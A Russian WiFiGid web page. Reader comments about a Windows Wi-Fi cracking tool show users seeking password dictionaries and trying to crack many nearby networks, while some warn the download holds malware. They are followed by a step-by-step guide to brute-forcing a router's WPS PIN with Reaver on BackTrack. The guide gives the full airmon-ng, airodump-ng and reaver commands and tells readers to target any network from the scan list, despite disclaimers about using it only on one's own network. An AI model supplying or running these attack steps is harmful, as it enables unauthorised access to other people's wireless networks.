Работает!!! только одна из папки исходники\wifi_cracker\bin\release\wifi_cracker.exe проверил несколько раз прога ни разу не ошиблась
-
Да чувак, респект тебе, по указанному тобой пути — все заработало! прога нашла подкинутый мною пароль от моей тестовой вафли в pass.txt. вывалила окно-пароль найден и тормознула на нем,он будет красным шрифтом)
Так что на виндовозе 7 32 все пашет,теперь будем пополнять базу до отказу)
-
-
забыл написать что проверил на windows 8.1 х64 и на windows 7 x86 прекрасно работает
-
кстате если база паролей есть у кого, выложите на файлообменник или ссылку на ресурс дайте в коментариях
-
Где найти пароль от архива???
-
Где скачать новую версию wificrack?
-
Это единственная версия. Новее или старее не существует! Не советую качать в друом месте. стопудово с винлокерами будет!!!
-
Работает через раз ) Знаю пароли от 3 сетей. добавил их в словарь и из 3х сетей только 1 пароль нашел )
-
Здравствуйте! Я разработчик ПО и думаю занятся дальнейшей разработкой этой проги.
-
ZyXEL Keenetic Lite не находит заранее вложенный пароль в pass.txt
-
почему найденый пароль зашифрован?
-
-
Люди подскажите плиз другую прогу для брутфорса ключей, эта не работает даже с нужным паролем в словаре, win7 32
-
У меня зашифрован скачанный файл что делать
-
-
перекачай файл заново, распаковывается нормально!
-
-
-
Я ПОЛЬЗУЮСЬ ПРОГРАММОЙ AIRSLAX КУПИЛ ЕЁ ЗА 1500 И НЕ ЖАЛЕЮ РЕАЛЬНО ПОДБИРАЕТ ПАРОЛЬ ОСОБЕННО WPS. ХОРОШИЕ ПРОГИ ТОЛЬКО ПЛАТНЫЕ.
-
А под linux именно такой способ подбора есть?
-
good)))) всё работает респект вам братья!)))
-
не могу открыть программу…. пишет ошибка контрольной суммы в зашифрованном файле…. помогите кто знает….
-
-
У меня тут сто сетей и не к одной не подобрал пароль, словарь который идет совсем маленький, подбирает долго, так может сто лет перебирать варианты
-
знаю точно, что пароль цифровой у искомой сети! Как настроить программу, чтобы перебирала только цифры? В принципе это для брута несложно!
-
странно работает сайт ваш, нету даже дат опубликования вопросов! почему это нужно скрывать?
-
А я вообще не могу запустить прогу. Пишет (Прекращена работа программы ) Что там надо сделать подробнее опишите.
-
Наверно антивирус мешает.
-
-
пожалуйста, скажите где словари?
-
-
СПС!!! Прога старая но до сих пор работает!
-
-
-
И я НЕ могУ чё за сайт вообще
-
Не качайте, куча вирусов там!
-
-
Расскажите как использовать пж
-
-
-
Комментарии реальные или фейковые? Если отправится, то вроде реальные…
-
Фейковые. Не качай! В архиве вирусы, паразиты и бактерии!
-
-
Прога работает отлично. Олег подсказал откуда ее запускать……. Работает!!! только одна из папки исходники\wifi_cracker\bin\release\wifi_cracker.exe проверял …. и ни разу не ошиблась
Олег….ТЫ МОЛОДЕЦ!
Теперь надо только пополнять и пополнять словарь… -
А еще прочитайте комментарий пользователя anonymus_63. Он поможет вам проверить утверждение Олега!
Статья и наш портал WiFiGid не призывают пользователей взламывать ЧУЖИЕ Wi-Fi сети. Материал написан автором для повышения знаний в сфере личной информационной безопасности домашней сети и безопасности W-Fi сетей в целом. Все описанное разрешено применять исключительно в своих локальных сетях. Несогласным с этим рекомендуем сразу же закрыть материал. Не забывайте, что применение этой информации на незаконном поле может повлечь за собой уголовное преследование. Давайте жить дружно и помогать друг другу защищаться от злодеев!
Привет всем! С самого начала давайте коротенько расскажем, что же такое Bruteforce WiFi. Это не простой брут перебор известных паролей, как это делается чаще всего. Конечно, есть вероятность таким образом взломать систему, но может пройти уйму времени, а в итоге взломщик не получит ничего.
Сегодня в статье мы рассмотрим одну уязвимость, которая существует ещё со времен создания роутеров, а именно WPS. WPS – это более простое подключение к роутеру. Очень часто производители маршрутизаторов включают данную функцию для того, чтобы обычный пользователь как можно быстрее и проще подключился к интернет-центру и настроил его.
Для подключения обычно используется отдельная сессия. А при запросе нужно ввести PIN код. Именно PIN код, а не пароль. Все дело в том, что PIN состоит из 8 цифр. Как вы начинаете понимать, такое соединение и правда можно взломать, так как у нас есть ограниченное количество переборов. Если говорить точнее, то их 100 000 000.
Сто миллионов это очень много, но пугаться не стоит. Все дело в том, что последняя циферка данного кода является всего лишь контрольной суммой, которая проверяет правильность введенного кода. Поэтому нам теперь надо перебрать всего лишь 10 миллионов. Тоже большая цифра, но на деле понадобится всего 11000 вариантов, и я сейчас докажу это.
Дело в том, что WPS аутентификация происходит в два этапа. То есть сначала отсылается первый пакет, а потом второй, то есть по 4 цифры.
ВНИМАНИЕ! Статья была написана только с целью ознакомления. В качестве примера была взломана своя сеть. Во многих странах взлом вай-фай – уголовно наказуемое занятие.
Содержание
- Схема и разбор аутентификации
- Реализация Брутфорса для WiFi
- Итоги и выводы
- Задать вопрос автору статьи
Схема и разбор аутентификации
И так для начала давайте взглянем на картинку ниже. Смотрите мы генерируем PIN, но перебор идёт только в первой части M4. После отправки первой части, если он не правильный мы отправляем его повторно. Если он правильный, то мы получаем положительный ответ и уже начинаем перебирать вторую часть M6, пока не получим положительный ответ.
Для реализации мы будем использовать операционную систему Linux. Вообще можете забыть про Windows, так как там нет ни одной нормальной программы для взлома. Сейчас я приведу скриншот примерного взлома.
Всё как я и говорил ранее. Сначала идёт перебор первой части, потом перебор второй. В самом конце система нам показывает полный пароль от беспроводной сети. Проблем как раз в том, что пользователи, настраивая свою точку доступа забывают отключать WPS. Вообще можно, конечно, не отключать эту функцию, а деактивировать аутентификацию с помощью пароля, оставив подключение с помощью нажатия кнопки ВПС.
- В первую очередь нам нужна Linux, да не простая и золотая. В общем самый оптимальный вариант это BackTrack. В данной паке зашиты все необходимые программы, а также специальные драйвера. Скачать можно на официальном сайте – backtrack-linux.org. При этом можно не устанавливать систему отдельно или как вторую ОС. А просто сделать загрузочный диск с виртуальной машиной. Дистрибутив также можно найти на том же сайте;
- Запускаем систему и командную строку. Вводим данные для входа:
- Логин: root;
- Пароль: toor;
- Вписываем команду:
startx
- Теперь нам нужно обновить программу Reaver, для этого понадобится интернет. Если у вас интернет идёт не от шлюза, а напрямую от провайдера по кабелю, то его надо будет ещё настроить. Если интернет идёт от роутера, то все в порядке – пляшем дальше. Прописываем команду для установки:
apt-get update
apt-get install reaver
svn checkout reaver-wps.googlecode.com/svn/trunk reaver-wps
cd ./reaver-wps/src/
./configure
make
make install
ПРИМЕЧАНИЕ! Можете, конечно, попробовать пользоваться уже установленной версией, но лучше все же ее обновить, командами сверху.
- Теперь нам нужно проверить, что беспроводной модуль работает правильно, а к нему подключились драйвера из коробки:
iwconfig
- Чаще всего подключение обозначатся как wlan0. Если вы подключались ранее к беспроводной сети, чтобы скачать reaver, то лучше отключиться от вашего Wi-Fi. Теперь нужно чтобы модуль был включен в режим поиска сетей. Он теперь будет ловить пакеты от всех беспроводных сетей:
airmon-ng start wlan0
- Должно создаться новое подключение mon0. Если у вас создалось, что-то другое, то далее вместо mon0 используйте свое название подключения. Теперь надо узнать MAC-адрес нужной точки доступа:
airodump-ng mon0
- Теперь вы должны будете увидеть список сетей. Обращаться мы будем к точке доступа именно по MAC-адресу. Поэтому далее вводим команду для запуска программы:
reaver -i mon0 -b 00:21:29:74:67:50 -vv
- Вместо MAC-адреса, который указан у меня, вы должны выбрать из списка сетей любой из первых и просто заменить её.
Теперь просто надо ждать и наблюдать. Система начнет перебор сначала M4, а потом M6. В самом конце мы увидим полную информацию по точке доступа, а также нужный нам ключ WPA PSK, по которому мы сможем подключиться. Перебор шёл примерно 3 с половиной часа. Но у меня слабый комп, так что возможно у вас получится сделать это куда быстрее.
Итоги и выводы
Статья в первую очередь была создана в ознакомительных целях. Защититься от данного способа взлома очень легко – просто заходим в настройки роутера и отключаем функцию WPS. Взламывал я именно свой маршрутизатор, так как вообще против чего-то противозаконного. Но как видите – у меня удалось это сделать несмотря на то, что пароль – очень сложный и длинный.